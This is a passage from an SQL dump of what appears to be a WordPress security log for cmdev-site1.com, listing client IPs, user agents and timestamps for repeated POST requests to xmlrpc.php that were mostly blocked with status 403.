Chrome\\/70.0.3538.102 Safari\\/537.36\"}','FUCHWGZA7R5imDeBbPagvylw',0,1681483866.8706,1015,'','POST',403,0,515,0,1,'',0),('176.56.56.133',2956474501,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','01xue8GBbaDqsUJL6dtK3TYn',0,1681483871.5852,606,'','POST',403,0,515,0,1,'',0),('77.29.23.74',1293752138,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','XENsrFODTmJWlaSUI1z6PYwq',0,1681483873.6635,602,'','POST',403,0,515,0,1,'',0),('144.76.74.227',2420919011,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','NEA0gDlGBjKeHXQ5caLFiRPb',0,1681483885.0568,613,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','ljo3mtQ9Es5Z6FDnIOS04Ma7',0,1681483892.4594,558,'','POST',403,0,515,0,1,'',0),('146.70.115.219',2454090715,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','RitlXExsGyvLKqSdDN29C6eu',0,1681484374.0128,644,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/wp-admin\\/\"}','aJhKEgwxGVINP72ULdOYyb5k',0,1681485447.8448,526,'','POST',200,0,500,0,1,'',510),('183.181.91.159',3082115999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','W7kfsTF8GzlbxJprahiKC4ON',0,1681487352.3421,2962,'','POST',403,0,515,0,1,'',0),('66.42.49.228',1110061540,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','RJfxPsXv031eqG7FoLKm8T2y',0,1681487358.6420,600,'','POST',403,0,515,0,1,'',0),('176.9.208.67',2953433155,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','rpaOdLo0S5wlPVYevmB43Q8E',0,1681487360.0706,583,'','POST',403,0,515,0,1,'',0),('38.242.129.230',653427174,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','HPYK9CiGZMI1Ujhbdy08noWf',0,1681487374.8872,4965,'','POST',403,0,515,0,1,'',0),('66.33.194.197',1109508805,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','2IhslNYQkRVUozx7iKwbLaTB',0,1681487376.7451,3722,'','POST',403,0,515,0,1,'',0),('80.88.87.150',1347966870,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','Ky2uabmPIdevqcBo1sWr4LX5',0,1681487383.2722,2170,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','oB80AP56qa4ZtCWwHfXIsm1l',0,1681487695.3594,2981,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','N62OlxBTUwjgcJKSQAzuFho9',0,1681487695.2754,3766,'','POST',403,0,515,0,1,'',0),('123.30.238.182',2065624758,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','uEj0WU9Py62HXM87tBIzReLv',0,1681487707.0410,2243,'','POST',403,0,515,0,1,'',0),('144.76.74.227',2420919011,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','7j8NexRbZ4y2H5AWGKm0PuTi',0,1681487710.3809,866,'','POST',403,0,515,0,1,'',0),('199.250.222.107',3355106923,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','RISjZAsJcBCiWvrQ0ME6FzUX',0,1681487715.3417,636,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','NDwSmTelzairFgkd40jHytO2',0,1681487725.3879,1452,'','POST',403,0,515,0,1,'',0),('103.42.56.253',1730820349,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','FT2IibqcP5wRy0ufYeKrMGBW',0,1681487732.9777,1011,'','POST',403,0,515,0,1,'',0),('74.208.59.164',1255160740,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','1TYBhpWjNZAuI60giM4dKctq',0,1681487739.6641,617,'','POST',403,0,515,0,1,'',0),('89.201.167.100',1506387812,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','RK3WTcj7PX4M9svLkZpBeFJy',0,1681487740.8264,599,'','POST',403,0,515,0,1,'',0),('162.0.232.58',2717968442,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','RoS2k73bMKVFveEUA1h6DPcI',0,1681487743.6317,551,'','POST',403,0,515,0,1,'',0),('199.85.208.215',3344290007,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','w9mXtK1R8SVWQGijeaITochF',0,1681487752.3508,630,'','POST',403,0,515,0,1,'',0),('38.242.129.230',653427174,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','kA6fwSaWKJ0QVZ3I1nuMLzYE',0,1681487804.4234,594,'','POST',403,0,515,0,1,'',0),('104.207.254.152',1758461592,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','vnfxeCj9uqT67ZLUs3Frb4gw',0,1681487811.5200,590,'','POST',403,0,515,0,1,'',0),('149.129.227.62',2508317502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','by5SqVM21NL98OmsHcTnJC6G',0,1681487813.0190,628,'','POST',403,0,515,0,1,'',0),('84.39.116.180',1411871924,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wvA0teg5KjmahIiQsdC4Xqc3',0,1681490470.2929,4484,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','1q9Z4nMVJTCjQEcvIBY02iuf',0,1681491306.6562,2091,'','POST',403,0,515,0,1,'',0),('91.231.140.73',1541901385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','N6XwmUZKqRLnGg2Et1lHkTbC',0,1681491305.7689,3743,'','POST',403,0,515,0,1,'',0),('104.236.7.86',1760298838,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','u1DebOC4A3rF5myt8jvxPcSB',0,1681491315.1194,578,'','POST',403,0,515,0,1,'',0),('195.158.22.187',3281917627,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','nt7xpkVe6IjfmbE3RFWgSAr8',0,1681491316.4702,975,'','POST',403,0,515,0,1,'',0),('134.122.120.71',2256173127,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','eoHqwuDgS5MxOGyFN40jdWX8',0,1681491317.0628,869,'','POST',403,0,515,0,1,'',0),('107.190.132.194',1807647938,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','M7CvROlLqSj13zT0VWEs95mX',0,1681491320.4415,594,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ZWF1EsUk89CQeLSGA0V5jY2o',0,1681491324.0068,617,'','POST',403,0,515,0,1,'',0),('141.138.169.247',2374674935,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','nlMdR2CftapboIkNv6uJ9ZSc',0,1681491325.3212,583,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','HPIdy0NnhUlLRi2XE54JuAfz',0,1681491330.2010,576,'','POST',403,0,515,0,1,'',0),('184.168.98.254',3098043134,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','THk6L0cp2efuDFmJKEbAqPdh',0,1681491331.4759,742,'','POST',403,0,515,0,1,'',0),('141.98.115.182',2372039606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','LplGc8THgu5sI6iWRvVf0MPQ',0,1681491340.3665,624,'','POST',403,0,515,0,1,'',0),('68.178.224.133',1152573573,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','nmGVhD3gNvauRekoTBKj9x24',0,1681491710.3966,4228,'','POST',403,0,515,0,1,'',0),('43.204.104.245',734816501,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','E6S39FuhWxIpVGR5cwNb17se',0,1681491713.4770,1486,'','POST',403,0,515,0,1,'',0),('176.56.56.133',2956474501,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','VNCc4fWkHur92mZOvnYsqxMI',0,1681491717.3731,549,'','POST',403,0,515,0,1,'',0),('159.89.203.225',2673462241,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','Kl0jacHkSsUCXYhAEemPvDML',0,1681491722.2758,1468,'','POST',403,0,515,0,1,'',0),('74.208.59.169',1255160745,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','RKxhB3tNkMX8WvmGHI7YFfiA',0,1681491722.4875,1390,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','wIofc1TBF0hmUl4SYROJPpn7',0,1681491725.8691,624,'','POST',403,0,515,0,1,'',0),('65.109.50.60',1097675324,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','Tjvp7oMfIgGFZLQzwNl6yUXb',0,1681491728.7795,566,'','POST',403,0,515,0,1,'',0),('144.76.74.227',2420919011,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','FRdPNnQBv6j7G1pgrLJm2tSa',0,1681491735.7403,913,'','POST',403,0,515,0,1,'',0),('178.32.201.69',2988493125,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','Hw5g6xMSqUz8o7YuJ4cdOZVf',0,1681491736.3485,825,'','POST',403,0,515,0,1,'',0),('185.25.23.45',3105429293,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','rIQRfzapnNoDV2KqJgTvcxW0',0,1681491740.6838,589,'','POST',403,0,515,0,1,'',0),('64.91.226.29',1079763485,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','3OxUtXEdmoRY9k6DfLgJKpju',0,1681491751.6626,596,'','POST',403,0,515,0,1,'',0),('213.152.161.165',3583549861,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zZnWpgIRSH9XOjyhKJqlmeso',0,1681492898.2332,3812,'','POST',403,0,515,0,1,'',0),('199.249.230.2',3355043330,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','TCwY7KDLd1qtraVMbS83UjmE',0,1681493536.1664,3844,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','SHxZzF13hngKp8EQMRbYmqAk',0,1681494027.7383,3770,'','POST',403,0,515,0,1,'',0),('134.122.120.71',2256173127,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','JSRlwqUCsjgchz8Q75VfnAa0',0,1681494032.7785,615,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','2XVN9MekJ6fw3tb4gPaZOycn',0,1681494045.2419,1332,'','POST',403,0,515,0,1,'',0),('91.225.138.200',1541507784,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','recimo5z0BI1SfCXhY8JnPVM',0,1681494046.2580,1595,'','POST',403,0,515,0,1,'',0),('103.154.184.198',1738193094,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','zh3KUSlQwWT8tHpyEINcRD45',0,1681494054.7869,551,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','VESTOeq3zhpWuBL1ItbQ0w4H',0,1681494059.1831,757,'','POST',403,0,515,0,1,'',0),('213.159.7.167',3583969191,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','7DuCeBwbgYyR1UmAivH3Zc2P',0,1681494059.9384,602,'','POST',403,0,515,0,1,'',0),('5.231.78.38',99044902,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','Ie4taY3J6wplbD0PANCTdcxX',0,1681494069.5389,1115,'','POST',403,0,515,0,1,'',0),('94.247.177.44',1593291052,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','TyYOznSf57WBQte61X0woRUG',0,1681494069.9624,999,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','6lyo7J9Fibq5GzxrfeTQh0s3',0,1681494074.5811,583,'','POST',403,0,515,0,1,'',0),('45.40.133.116',757630324,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','vrHYe9Vf8XCQpmikcKF6SxZh',0,1681494076.7386,559,'','POST',403,0,515,0,1,'',0),('185.231.59.197',3118939077,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','Cn7qsIVawgTWYEAMRoOXzj8i',0,1681496160.6556,767,'','POST',403,0,515,0,1,'',0),('198.54.124.210',3325459666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','SMWamtjA8nCRUiPX65bD94vl',0,1681496162.2345,670,'','POST',403,0,515,0,1,'',0),('74.208.59.169',1255160745,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','xdS5YNo9POt8TiX72hcDFRW6',0,1681496164.3846,593,'','POST',403,0,515,0,1,'',0),('101.32.190.143',1696644751,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','XB4Tizg3hjpKOY2GdH8DyRUE',0,1681496172.3250,699,'','POST',403,0,515,0,1,'',0),('139.59.13.196',2335903172,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','Fm6hXnZfCpjR0YAzweb47rsP',0,1681496176.0820,3695,'','POST',403,0,515,0,1,'',0),('45.122.222.221',763027165,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','iIBCcvEV0QSL63eHkm8YAX7a',0,1681496176.7541,3029,'','POST',403,0,515,0,1,'',0),('69.10.33.186',1158291898,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','leP7xp8S6Nr312XOMa4LGqd5',0,1681496187.7373,1108,'','POST',403,0,515,0,1,'',0),('144.76.74.227',2420919011,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','9HQKArsw5PpvkDIZhmfRn6dl',0,1681496188.1573,965,'','POST',403,0,515,0,1,'',0),('185.141.215.15',3113080591,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','c1HAMoZil5ywEpYzO9KfFGb6',0,1681496204.6218,553,'','POST',403,0,515,0,1,'',0),('51.68.78.70',860114502,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','WEzIBR2T9fork7iwgHevPG6F',0,1681496206.6977,619,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','vihC8KISXdLFTsN3Y9G127bn',0,1681496212.8377,599,'','POST',403,0,515,0,1,'',0),('157.245.147.60',2650116924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','wtAXIpcsfRvT2eBPOyVigEbG',0,1681499319.6452,944,'','POST',403,0,515,0,1,'',0),('52.66.42.83',876751443,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','1O695HPzaZBgswbn8Rq2iKEI',0,1681499321.8881,579,'','POST',403,0,515,0,1,'',0),('185.135.132.97',3112666209,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','FgDrmYKn7vhjZiONzkb0u58s',0,1681499329.4328,596,'','POST',403,0,515,0,1,'',0),('149.129.227.62',2508317502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','pN3OKznb9xYPCwTkXZlgvuLA',0,1681499339.1726,569,'','POST',403,0,515,0,1,'',0),('89.163.145.59',1503891771,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','FSm7trOKB1vR8WjyNVkPQzUi',0,1681499339.9910,589,'','POST',403,0,515,0,1,'',0),('91.225.138.200',1541507784,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','DuBcFoYIsG9ROnAN8yMgl54j',0,1681499343.2112,601,'','POST',403,0,515,0,1,'',0),('66.42.49.228',1110061540,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','U4IdBjGEPN9y2bLpfD1iwRtQ',0,1681499351.9186,563,'','POST',403,0,515,0,1,'',0),('88.214.28.5',1490426885,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 